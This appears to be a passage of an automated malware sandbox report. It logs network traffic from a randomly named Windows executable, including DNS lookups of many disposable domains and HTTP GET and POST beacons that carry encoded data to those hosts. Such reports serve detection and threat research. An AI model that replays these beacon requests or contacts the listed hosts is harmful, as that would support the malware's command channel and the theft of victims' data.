                                                                                          Jan 8, 2025 15:02:56.720065117 CET8050014154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:56.720211029 CET8050014154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:56.720350981 CET5001480192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:57.367644072 CET5001480192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:58.387975931 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:58.509639978 CET8050015154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:58.509726048 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:58.524048090 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:02:58.528956890 CET8050015154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:59.365149021 CET8050015154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:59.365294933 CET8050015154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:02:59.365461111 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:00.038749933 CET5001580192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:01.057939053 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:01.062829971 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:01.062947035 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:01.077356100 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:01.082159042 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:01.082336903 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605134010 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605155945 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605197906 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605310917 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:02.605355024 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605484009 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:02.605484009 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:02.605835915 CET8050016154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:02.605886936 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:02.606475115 CET5001680192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:03.621073008 CET5001780192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:03.761409044 CET8050017154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:03.761540890 CET5001780192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:03.783493042 CET5001780192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:03.788265944 CET8050017154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:04.648199081 CET8050017154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:04.648269892 CET8050017154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:03:04.648395061 CET5001780192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:04.661386967 CET5001780192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:03:04.666327953 CET8050017154.213.39.66192.168.2.6

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 8, 2025 14:59:33.252701998 CET5885853192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 14:59:33.637382984 CET53588581.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 14:59:50.338499069 CET6037653192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 14:59:51.282987118 CET53603761.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:00:05.167141914 CET6044153192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:00:05.181603909 CET53604411.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:00:19.464049101 CET6256553192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:00:19.475791931 CET53625651.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:00:33.213702917 CET6201953192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:00:33.225605011 CET53620191.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:00:41.301337957 CET5208353192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:00:41.369594097 CET53520831.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:00:54.497474909 CET5007253192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:00:54.506550074 CET53500721.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:01:02.626422882 CET5567653192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:01:02.729482889 CET53556761.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:01:16.591289043 CET6322353192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:01:16.604664087 CET53632231.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:01:29.886708975 CET6445553192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:01:29.902587891 CET53644551.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:01:43.079997063 CET4972353192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:01:43.097182989 CET53497231.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:01:57.277687073 CET6268153192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:01:58.273088932 CET6268153192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:01:59.197990894 CET53626811.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:01:59.198008060 CET53626811.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:02:13.121488094 CET5132853192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:02:13.130341053 CET53513281.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:02:21.219557047 CET5042253192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:02:21.228049040 CET53504221.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:02:29.308382988 CET6132053192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:02:29.324350119 CET53613201.1.1.1192.168.2.6
                                                                                          Jan 8, 2025 15:02:37.448587894 CET4972653192.168.2.61.1.1.1
                                                                                          Jan 8, 2025 15:02:37.458915949 CET53497261.1.1.1192.168.2.6

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Jan 8, 2025 14:59:33.252701998 CET192.168.2.61.1.1.10xd4ccStandard query (0)www.aihuzhibo.netA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 14:59:50.338499069 CET192.168.2.61.1.1.10xb109Standard query (0)www.f5jh81t3k1w8.sbsA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:05.167141914 CET192.168.2.61.1.1.10x2bdaStandard query (0)www.cruycq.infoA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:19.464049101 CET192.168.2.61.1.1.10x6345Standard query (0)www.neoparty.sbsA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:33.213702917 CET192.168.2.61.1.1.10x3d8bStandard query (0)www.1126xx.shopA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:41.301337957 CET192.168.2.61.1.1.10x33e3Standard query (0)www.deadshoy.techA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:54.497474909 CET192.168.2.61.1.1.10x13b4Standard query (0)www.reynamart.storeA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:02.626422882 CET192.168.2.61.1.1.10xe37bStandard query (0)www.mosorehlable.onlineA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:16.591289043 CET192.168.2.61.1.1.10x2f46Standard query (0)www.solidf.xyzA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:29.886708975 CET192.168.2.61.1.1.10xa3d9Standard query (0)www.laduta.xyzA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:43.079997063 CET192.168.2.61.1.1.10x2b45Standard query (0)www.londonatnight.coffeeA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:57.277687073 CET192.168.2.61.1.1.10x54d6Standard query (0)www.itcomp.storeA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:58.273088932 CET192.168.2.61.1.1.10x54d6Standard query (0)www.itcomp.storeA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:02:13.121488094 CET192.168.2.61.1.1.10x1299Standard query (0)www.envisionmedia.shopA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:02:21.219557047 CET192.168.2.61.1.1.10x1b65Standard query (0)www.vavada-official.buzzA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:02:29.308382988 CET192.168.2.61.1.1.10xaf4fStandard query (0)www.sob.ripA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:02:37.448587894 CET192.168.2.61.1.1.10x2ae5Standard query (0)www.brunokito.cloudA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Jan 8, 2025 14:59:33.637382984 CET1.1.1.1192.168.2.60xd4ccNo error (0)www.aihuzhibo.net192.186.58.31A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 14:59:51.282987118 CET1.1.1.1192.168.2.60xb109No error (0)www.f5jh81t3k1w8.sbs154.213.39.66A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:05.181603909 CET1.1.1.1192.168.2.60x2bdaNo error (0)www.cruycq.info47.83.1.90A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:19.475791931 CET1.1.1.1192.168.2.60x6345No error (0)www.neoparty.sbs104.21.53.168A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:19.475791931 CET1.1.1.1192.168.2.60x6345No error (0)www.neoparty.sbs172.67.215.171A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:33.225605011 CET1.1.1.1192.168.2.60x3d8bName error (3)www.1126xx.shopnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:41.369594097 CET1.1.1.1192.168.2.60x33e3No error (0)www.deadshoy.tech199.59.243.228A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:00:54.506550074 CET1.1.1.1192.168.2.60x13b4Name error (3)www.reynamart.storenonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:02.729482889 CET1.1.1.1192.168.2.60xe37bNo error (0)www.mosorehlable.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:16.604664087 CET1.1.1.1192.168.2.60x2f46No error (0)www.solidf.xyz199.192.21.169A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:29.902587891 CET1.1.1.1192.168.2.60xa3d9No error (0)www.laduta.xyz192.64.119.109A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:43.097182989 CET1.1.1.1192.168.2.60x2b45No error (0)www.londonatnight.coffee13.248.169.48A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:43.097182989 CET1.1.1.1192.168.2.60x2b45No error (0)www.londonatnight.coffee76.223.54.146A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:59.197990894 CET1.1.1.1192.168.2.60x54d6No error (0)www.itcomp.storeitcomp.storeCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:59.197990894 CET1.1.1.1192.168.2.60x54d6No error (0)itcomp.store103.247.11.204A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:59.198008060 CET1.1.1.1192.168.2.60x54d6No error (0)www.itcomp.storeitcomp.storeCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 8, 2025 15:01:59.198008060 CET1.1.1.1192.168.2.60x54d6No error (0)itcomp.store103.247.11.204A (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:02:13.130341053 CET1.1.1.1192.168.2.60x1299Name error (3)www.envisionmedia.shopnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:02:21.228049040 CET1.1.1.1192.168.2.60x1b65Name error (3)www.vavada-official.buzznonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:02:29.324350119 CET1.1.1.1192.168.2.60xaf4fName error (3)www.sob.ripnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 8, 2025 15:02:37.458915949 CET1.1.1.1192.168.2.60x2ae5Name error (3)www.brunokito.cloudnonenoneA (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.aihuzhibo.net
                                                                                          • www.f5jh81t3k1w8.sbs
                                                                                          • www.cruycq.info
                                                                                          • www.neoparty.sbs
                                                                                          • www.deadshoy.tech
                                                                                          • www.mosorehlable.online
                                                                                          • www.solidf.xyz
                                                                                          • www.laduta.xyz
                                                                                          • www.londonatnight.coffee
                                                                                          • www.itcomp.store

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.649843192.186.58.31802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 14:59:33.664927959 CET514OUTGET /rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.aihuzhibo.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 14:59:34.664870977 CET1236INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:34 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 66 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 63 6d 6e 2d 48 61 6e 73 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 6b 6b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 33 34 33 33 3b 26 23 32 31 33 33 31 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 39 32 35 36 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 33 34 33 33 3b 26 23 33 35 30 31 33 3b 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 6b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 ef b8 8f f0 9f 8d a5 26 23 32 37 34 32 36 3b 26 23 33 36 38 31 34 3b 26 23 32 30 33 35 31 3b 26 23 32 39 39 39 32 3b f0 9f 93 bb 6b 6b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b f0 9f 94 a5 f0 9f 98 81 f0 9f 94 a5 26 23 32 35 39 30 33 3b 26 23 32 [TRUNCATED]
                                                                                          Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>kk&#30452;&#25773;&#23433;&#21331;&#26368;&#26032;&#29256;&#20813;&#36153;&#23433;&#35013;</title><meta http-equiv="keywords" content="kk&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;kk&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,kk&#30452;&#25773;&#23433;&#21331;&#23448;&#26041;&#19979;&#36733;&#20307;&#39564;&#24179;&#21488;&#36824;&#35774;&#26377;&#31038;&#21306;&#21151;&#33021;&#35753;&#20320;&#19982;&#20854;&#20182;&#20307;&#32946;&#29233;&#22909;&#32773;&#19968;&#36215;&#20998;&#20139;&#36816;&#21160;&#24515;&#24471;&#20132;&#27969;&#32463;&#39564;&#32467;&#20132;&#26379;&#21451;"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="applicable-device" content="pc"><link rel="alternate" media="only s [TRUNCATED]
                                                                                          Jan 8, 2025 14:59:34.664912939 CET1236INData Raw: 77 77 77 2e 61 69 68 75 7a 68 69 62 6f 2e 6e 65 74 2f 72 64 74 6c 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 61 67 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 6d 61 74 3d 78 68 74 6d 6c 3b 75 72 6c 3d 68 74 74 70 3a
                                                                                          Data Ascii: www.aihuzhibo.net/rdtl/"><meta name="mobile-agent" content="format=xhtml;url=http://www.aihuzhibo.net/rdtl/"><meta name="mobile-agent" content="format=html5;url=http://www.aihuzhibo.net/rdtl/"><meta http-equiv="Cache-Control" content="no-sitea
                                                                                          Jan 8, 2025 14:59:34.664928913 CET1236INData Raw: 68 75 7a 68 69 62 6f 2e 6e 65 74 2f 74 65 6d 70 6c 61 74 65 2f 6e 65 77 73 2f 77 61 6e 64 6f 75 6a 69 61 2f 73 74 61 74 69 63 2f 6a 73 2f 69 6e 64 65 78 2e 75 6d 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22
                                                                                          Data Ascii: huzhibo.net/template/news/wandoujia/static/js/index.umd.js"></script><input type="hidden" id="__wdjPageType" value="PC"><input type="hidden" id="__appOffline" value="false"><input type="hidden" id="__appRN" value="false"><input type="hidden" i
                                                                                          Jan 8, 2025 14:59:34.664942980 CET1236INData Raw: 20 64 69 72 3d 22 30 37 36 30 30 63 22 3e 3c 2f 61 72 65 61 3e 3c 6d 61 70 20 6c 61 6e 67 3d 22 39 37 31 64 65 37 22 3e 3c 2f 6d 61 70 3e 3c 62 64 6f 20 64 72 61 67 67 61 62 6c 65 3d 22 66 31 62 63 61 39 22 3e 3c 2f 62 64 6f 3e 3c 64 69 76 20 64
                                                                                          Data Ascii: dir="07600c"></area><map lang="971de7"></map><bdo draggable="f1bca9"></bdo><div date-time="4d9ca6" class="f4d9ca logo-wp"><a class="g88208 pngFix logo" href="/" title=""></a></div><dfn dropzone=
                                                                                          Jan 8, 2025 14:59:34.664988995 CET1236INData Raw: 6e 65 3d 22 35 36 31 62 36 63 22 3e 3c 2f 62 64 6f 3e 3c 64 66 6e 20 64 61 74 65 2d 74 69 6d 65 3d 22 33 34 65 35 64 37 22 3e 3c 2f 64 66 6e 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 70 61 39 35 66 31 20 70 61 72 65 6e 74 2d 6d 65 6e 75 20 63 6c 65 61
                                                                                          Data Ascii: ne="561b6c"></bdo><dfn date-time="34e5d7"></dfn><ul class="pa95f1 parent-menu clearfix"><li class="q9afe1 nav-item"><a class="r8b3f1 first-link" href="/"><span></span></a></li><li class="s8ab8b has-subs nav-item app-tag-wrap"><a class=
                                                                                          Jan 8, 2025 14:59:34.664999962 CET1236INData Raw: 22 20 63 6c 61 73 73 3d 22 69 35 33 65 36 30 20 6c 6f 67 69 6e 2d 6d 6f 64 61 6c 22 3e 3c 73 75 70 20 64 72 6f 70 7a 6f 6e 65 3d 22 36 35 66 30 32 32 22 3e 3c 2f 73 75 70 3e 3c 74 69 6d 65 20 64 61 74 65 2d 74 69 6d 65 3d 22 35 62 63 63 62 31 22
                                                                                          Data Ascii: " class="i53e60 login-modal"><sup dropzone="65f022"></sup><time date-time="5bccb1"></time><tt dir="527c2c"></tt><div dir="ad5ebd" class="j2bae0 modal-wrap login-wrap pc"><span class="kaf480 close-btn" id="login_close"></span><var lang="a1494d"
                                                                                          Jan 8, 2025 14:59:34.665014982 CET1236INData Raw: 73 73 3d 22 73 38 30 34 33 32 20 65 72 72 6f 72 2d 74 65 78 74 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 70 68 6f 6e 65 5f 65 72 72 6f 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 6d 61 6c 6c 20 64 61 74 65 2d 74 69 6d 65 3d 22 33 35 65 63 66 62
                                                                                          Data Ascii: ss="s80432 error-text" id="login_phone_error"></div></div><small date-time="35ecfb"></small><sup dir="b67dc9"></sup><time lang="062285"></time><div draggable="8ab8b9" class="t0589b input-wrap"><input type="number" id="login_code" class="u453b2
                                                                                          Jan 8, 2025 14:59:34.665076017 CET1236INData Raw: 3e 3c 61 72 65 61 20 64 69 72 3d 22 64 64 39 31 39 64 22 3e 3c 2f 61 72 65 61 3e 3c 6d 61 70 20 6c 61 6e 67 3d 22 64 63 63 36 34 62 22 3e 3c 2f 6d 61 70 3e 3c 64 69 76 20 64 72 61 67 67 61 62 6c 65 3d 22 65 30 64 65 35 62 22 20 69 64 3d 22 6c 6f
                                                                                          Data Ascii: ><area dir="dd919d"></area><map lang="dcc64b"></map><div draggable="e0de5b" id="login_submit" class="b001ab login-btn active"></div></div></div></div><bdo draggable="245f88"></bdo><dfn dropzone="6b3b80"></dfn><font date-time="c1870
                                                                                          Jan 8, 2025 14:59:34.665087938 CET1236INData Raw: 67 6f 75 74 22 3e e9 80 80 e5 87 ba e7 99 bb e5 bd 95 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 74 74 20 64 69 72 3d 22 61 30 35 62 65 63 22 3e 3c 2f 74 74 3e 3c 76 61 72 20 6c 61 6e 67 3d 22 65 32 61 64 33 61 22
                                                                                          Data Ascii: gout"></div></div></div></div><tt dir="a05bec"></tt><var lang="e2ad3a"></var><area draggable="5a2e72"></area><div dir="188f78" id="header__global__tips" class="k9f862 modal-tips"></div><map dropzone="9ebe61"></map><bdo date-time="2
                                                                                          Jan 8, 2025 14:59:34.665098906 CET1236INData Raw: e4 bb b6 e5 88 86 e7 b1 bb 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 71 36 33 37 61 35 20 73 65 70 22 3e 26 6e 62 73 70 3b 26 67 74 3b 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 3c 62 64 6f 20 64 69 72
                                                                                          Data Ascii: </span></a></div><span class="q637a5 sep">&nbsp;&gt;&nbsp;</span><bdo dir="9d2890"></bdo><dfn lang="c55a5f"></dfn><font draggable="592c1a"></font><div dir="af480f" class="r5b6be index"><h1 class="s83251 crumb-h1"><span class="td067c c
                                                                                          Jan 8, 2025 14:59:34.669831991 CET1236INData Raw: 22 2f 2f 77 77 77 2e 61 69 68 75 7a 68 69 62 6f 2e 6e 65 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 e8 b1 8c e8 b1 86 e8 8d 9a e7 bc 96 e8 be 91 e4 ba b2 e6 b5 8b e5 9f ba e6 9c ac e5 8f af e7 94 a8 ef bc 8c e6
                                                                                          Data Ascii: "//www.aihuzhibo.net" target="_blank" title="" rel="nofollow"></a></p></div><tt dropzone="8740f7"></tt><var date-time="93a492"></var><area dir="385aa4"></area><div draggable="7a95ba"


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.649955154.213.39.66802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 14:59:51.304882050 CET778OUTPOST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 77 33 6e 37 50 78 2b 30 4c 78 4b 35 45 75 2f 68 53 30 33 37 78 4e 43 78 2f 61 35 69 4e 44 54 57 42 73 56 42 33 54 39 4c 52 30 59 39 71 62 76 42 63 66 39 53 67 79 76 31 74 58 4e 5a 4c 6c 36 45 33 4c 55 49 51 35 31 61 30 75 6d 36 34 6c 46 6f 70 69 5a 59 50 38 6c 38 72 70 6f 4c 2b 54 52 4b 71 65 51 7a 6d 33 66 49 52 36 76 6e 56 44 77 46 34 66 63 31 43 47 2f 4b 54 42 43 4f 7a 63 45 35 75 4e 45 45 75 44 4d 76 56 48 51 63 56 5a 66 7a 78 35 52 68 51 44 64 4f 6f 32 4e 31 66 73 58 56 33 30 55 56 59 6e 45 30 75 35 67 58 75 52 38 58 53 7a 4a 53 64 7a 69 49 51 48 4e 56 66 47 2f 6e 78 55 78 34 36 51 74 4f 31 30 2b 4e
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5Eu/hS037xNCx/a5iNDTWBsVB3T9LR0Y9qbvBcf9Sgyv1tXNZLl6E3LUIQ51a0um64lFopiZYP8l8rpoL+TRKqeQzm3fIR6vnVDwF4fc1CG/KTBCOzcE5uNEEuDMvVHQcVZfzx5RhQDdOo2N1fsXV30UVYnE0u5gXuR8XSzJSdziIQHNVfG/nxUx46QtO10+N
                                                                                          Jan 8, 2025 14:59:52.189286947 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:52 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
